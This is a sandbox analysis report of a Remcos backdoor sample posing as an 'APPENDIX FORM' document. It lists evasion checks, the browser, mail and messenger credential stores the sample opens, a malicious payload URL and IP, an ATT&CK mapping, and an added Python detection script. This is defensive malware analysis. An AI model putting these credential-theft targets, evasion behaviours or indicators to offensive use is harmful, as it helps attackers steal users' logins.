            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc44A6.tmp\System.dll
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | API coverage: 4.4 %
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | API coverage: 9.9 %
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe TID: 1268 | Thread sleep count: 269 > 30
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe TID: 1268 | Thread sleep time: -807000s >= -30000s
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe TID: 1268 | Thread sleep count: 9718 > 30
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe TID: 1268 | Thread sleep time: -29154000s >= -30000s
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_00402647 FindFirstFileA,0_2_00402647
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_00405FE4 FindFirstFileA,FindClose,0_2_00405FE4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055A0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_00402647 FindFirstFileA,4_2_00402647
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_00405FE4 FindFirstFileA,FindClose,4_2_00405FE4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004055A0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_333E10F1
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_333E6580
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0040AE51 FindFirstFileW,FindNextFileW,8_2_0040AE51
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407EF8
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407898
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_00418981 memset,GetSystemInfo,8_2_00418981
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.000000000288E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: bhv2DCB.tmp.8.dr | Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | API call chain: ExitProcess graph end node graph_0-4249
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | API call chain: ExitProcess graph end node graph_0-4253
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | API call chain: ExitProcess graph end node graph_9-34109
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_00401F68 LdrInitializeThunk,GetModuleHandleA,LoadLibraryExA,GetProcAddress,FreeLibrary,0_2_00401F68
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_333E2639
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_0040600B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040600B
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E4AB4 mov eax, dword ptr fs:[00000030h] 4_2_333E4AB4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E724E GetProcessHeap,4_2_333E724E
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_333E2B1C
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_333E2639
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_333E60E2

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Section loaded: NULL target: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Section loaded: NULL target: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Section loaded: NULL target: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hhicqmxmcuubmwccmnspqit"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\rjnmrfinqcmgocyodymjbnnrmv"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsfsxbheketyimsnjzkeaiancxhuh"
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.2163539656.00000000028E2000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601858735.00000000028E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.2163539656.00000000028E2000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601858735.00000000028E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager_
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.2163539656.00000000028E2000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E2933 cpuid 4_2_333E2933
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_333E2264
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,9_2_004082CD
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_00405D02 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D02
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: ESMTPPassword 9_2_004033F0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 9_2_00402DB3
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 9_2_00402DB3
            Source: Yara match | File source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 3616, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-CDCZ2K
Source: Yara match | File source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR
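The behaviour lines above (browser, mail and instant-messenger credential stores opened by the sample, plus the Rmc- mutex) translate directly into a host-based hunting rule. The following is an added example, not part of the Joe Sandbox report and not Remcos code: it scores processes from EDR-style events (process, operation, target) that you would map from your own telemetry. The event schema, the benign-owner allowlist, the six-alphanumeric generalisation of the mutex suffix and the control processes in the sample data are assumptions; the paths, registry keys and the mutex name are the ones the report lists.

```python
"""Hunting logic derived from the credential-store access and the Rmc- mutex this
report lists.  Added example, not part of the Joe Sandbox report.  Events are
constructed EDR-style dicts; map your own telemetry (Sysmon registry events, EDR
file-open and mutex events) onto {"pid", "image", "op", "target"}."""
import re
from collections import defaultdict

# Credential stores the report shows the sample opening, grouped by what they hold.
# Patterns are regexes over the full path / key name (matched case-insensitively).
CREDENTIAL_TARGETS = {
    "browser": [
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\places\.sqlite$",
        r"\\Mozilla\\Firefox\\profiles\.ini$",
        r"\\Microsoft\\Edge\\User Data\\[^\\]+\\Login Data$",
    ],
    "mail": [
        r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts$",
        r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles$",
        r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail$",
        r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities$",
    ],
    "im": [
        r"^HKEY_CURRENT_USER\\Software\\Google\\Google Talk\\Accounts$",
        r"^HKEY_CURRENT_USER\\Software\\Paltalk$",
    ],
}

# Processes that legitimately open their own store; an assumption to tune per estate.
BENIGN_OWNERS = {
    "browser": {"firefox.exe", "msedge.exe"},
    "mail": {"outlook.exe", "wlmail.exe"},
    "im": set(),
}

# The report shows the mutex \Sessions\1\BaseNamedObjects\Rmc-CDCZ2K.  Generalising the
# suffix to six upper-case alphanumerics is an assumption, not something the report states.
REMCOS_MUTEX = re.compile(r"(?:^|\\)Rmc-[A-Z0-9]{6}$")


def classify_target(target):
    """Return the credential-store category of a path / registry key, or None."""
    for category, patterns in CREDENTIAL_TARGETS.items():
        if any(re.search(p, target, re.IGNORECASE) for p in patterns):
            return category
    return None


def evaluate(events, min_categories=2):
    """Flag a process when it reads stores of at least `min_categories` different kinds
    that it does not own, or when it creates a Remcos-style mutex.  Returns {pid: verdict}."""
    state = defaultdict(lambda: {"image": None, "categories": set(), "mutex": False})
    for ev in events:
        s = state[ev["pid"]]
        s["image"] = ev["image"]
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        if ev["op"] in ("file_open", "reg_open"):
            cat = classify_target(ev["target"])
            if cat and exe not in BENIGN_OWNERS[cat]:
                s["categories"].add(cat)
        elif ev["op"] == "mutex_create" and REMCOS_MUTEX.search(ev["target"]):
            s["mutex"] = True
    verdicts = {}
    for pid, s in state.items():
        reasons = []
        if len(s["categories"]) >= min_categories:
            reasons.append("credential stores read: " + ", ".join(sorted(s["categories"])))
        if s["mutex"]:
            reasons.append("Remcos-style mutex created")
        verdicts[pid] = {"image": s["image"], "suspicious": bool(reasons), "reasons": reasons}
    return verdicts


# Constructed sample events modelled on the report's behaviour lines (6836 is the PID in
# the Yara match); the msedge.exe and notepad.exe events are invented negative controls.
SAMPLE = r"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
SAMPLE_EVENTS = [
    {"pid": 6836, "image": SAMPLE, "op": "file_open",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite"},
    {"pid": 6836, "image": SAMPLE, "op": "file_open",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"pid": 6836, "image": SAMPLE, "op": "reg_open",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"},
    {"pid": 6836, "image": SAMPLE, "op": "reg_open",
     "target": r"HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts"},
    {"pid": 6836, "image": SAMPLE, "op": "mutex_create",
     "target": r"\Sessions\1\BaseNamedObjects\Rmc-CDCZ2K"},
    {"pid": 4242, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "op": "file_open", "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"pid": 777, "image": r"C:\Windows\System32\notepad.exe", "op": "reg_open",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail"},
]

if __name__ == "__main__":
    for pid, v in evaluate(SAMPLE_EVENTS).items():
        name = v["image"].rsplit("\\", 1)[-1]
        print(pid, name, "SUSPICIOUS" if v["suspicious"] else "ok", v["reasons"])
```

The two-category threshold is what separates a stealer from an application reading its own store: Edge opening Login Data is expected, one foreign process touching browser, mail and IM stores within seconds is not. The mutex match is kept as an independent reason because it fires before any credential access happens.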
MITRE ATT&CK Matrix

Techniques the matrix flags for this sample, by tactic. The number in parentheses is the signature count as rendered in the matrix cell; unflagged matrix cells (the static technique grid) are omitted. Reconnaissance, Resource Development, Initial Access, Lateral Movement and Exfiltration have no flagged techniques.

Execution: Native API (11); Command and Scripting Interpreter (2)
Persistence: DLL Side-Loading (1)
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (112)
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (2); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (112)
Credential Access: OS Credential Dumping (1); Credentials in Registry (2); Credentials In Files (1)
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (228); Security Software Discovery (231); Virtualization/Sandbox Evasion (1); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1)
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Clipboard Data (2)
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (2); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (112)
Impact: System Shutdown/Reboot (1)
Antivirus detection (Source | Detection | Scanner | Label)
APPENDIX FORM_N#U00b045013-20241120.com.exe | 53% | ReversingLabs | Win32.Backdoor.Remcos
C:\Users\user\AppData\Local\Temp\nsc44A6.tmp\System.dll | 0% | ReversingLabs | (no label)
No Antivirus matches
No Antivirus matches
http://45.133.158.36/cvTLIRXJzBJoApmtjAY235.bin | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
geoplugin.net | 178.237.33.50 | true | false | none | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | none | high

URLs (Name | Malicious | Antivirus Detection | Reputation)
http://geoplugin.net/json.gp | false | none | high
http://45.133.158.36/cvTLIRXJzBJoApmtjAY235.bin | true | Avira URL Cloud: safe | unknown

Note the mismatch on the second URL: Joe Sandbox marks the download of the GuLoader payload as malicious while Avira URL Cloud still rates it safe, so URL-reputation feeds alone would not have blocked this stage.
URLs found in memory and binary strings (Name | Source). Every entry below is marked by Joe Sandbox as not malicious, with no antivirus detection and high reputation; URLs are reproduced as extracted, including trailing bytes that string extraction attached to some of them (e.g. json.gp0G).
http://geoplugin.net/json.gp$ | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P | bhv2DCB.tmp.8.dr
https://www.office.com/ | bhv2DCB.tmp.8.dr
https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9 | bhv2DCB.tmp.8.dr
http://www.imvu.comr | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp; APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmp
http://geoplugin.net/json.gp0G | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp
http://geoplugin.net/json.gpMG | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp
https://aefd.nelreports.net/api/report?cat=bingth | bhv2DCB.tmp.8.dr
http://geoplugin.net/json.gp- | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp
http://www.imvu.com | APPENDIX FORM_N#U00b045013-20241120.com.exe; APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969235766.000000000086D000.00000004.00000020.00020000.00000000.sdmp; APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969187492.000000000086D000.00000004.00000020.00020000.00000000.sdmp; APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmp
https://aefd.nelreports.net/api/report?cat=wsb | bhv2DCB.tmp.8.dr
http://www.imvu.comppData | APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969235766.000000000086D000.00000004.00000020.00020000.00000000.sdmp; APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969187492.000000000086D000.00000004.00000020.00020000.00000000.sdmp
http://www.nirsoft.net | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985266200.0000000000193000.00000004.00000010.00020000.00000000.sdmp
https://aefd.nelreports.net/api/report?cat=bingaotak | bhv2DCB.tmp.8.dr
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg | bhv2DCB.tmp.8.dr
https://deff.nelreports.net/api/report?cat=msn | bhv2DCB.tmp.8.dr
http://nsis.sf.net/NSIS_ErrorError | APPENDIX FORM_N#U00b045013-20241120.com.exe
https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05 | bhv2DCB.tmp.8.dr
https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58 | bhv2DCB.tmp.8.dr
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp; APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmp
http://geoplugin.net/json.gpTGu | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp
https://www.google.com | APPENDIX FORM_N#U00b045013-20241120.com.exe; APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmp
http://geoplugin.net/json.gpA | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp
http://nsis.sf.net/NSIS_Error | APPENDIX FORM_N#U00b045013-20241120.com.exe
https://aefd.nelreports.net/api/report?cat=bingaot | bhv2DCB.tmp.8.dr
https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb | bhv2DCB.tmp.8.dr
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhv2DCB.tmp.8.dr
http://geoplugin.net/json.gpN | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp
https://aefd.nelreports.net/api/report?cat=bingrms | bhv2DCB.tmp.8.dr
https://www.google.com/accounts/servicelogin | APPENDIX FORM_N#U00b045013-20241120.com.exe
https://login.yahoo.com/config/login | APPENDIX FORM_N#U00b045013-20241120.com.exe
http://www.nirsoft.net/ | APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmp
http://geoplugin.net/json.gp_ | APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c& | bhv2DCB.tmp.8.dr
http://www.ebuddy.com | APPENDIX FORM_N#U00b045013-20241120.com.exe; APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmp

The nirsoft.net, imvu.com, ebuddy.com, google.com/accounts/servicelogin and login.yahoo.com/config/login strings in the process 0000000A image at 0x400000 are the embedded NirSoft password-recovery component (see the WebBrowserPassView Yara match above), not contacts made by the sample; the bhv2DCB.tmp.8.dr entries are Microsoft telemetry endpoints from a dropped browser artefact.
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
45.133.158.36 | unknown | Germany | 40676 | AS40676US | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560110
Start date and time: 2024-11-21 12:18:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: APPENDIX FORM_N#U00b045013-20241120.com.exe (renamed because the original name is a hash value)
Original Sample Name: APPENDIX FORM_N45013-20241120.com.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 183
• Number of non-executed functions: 311
Cookbook Comments:
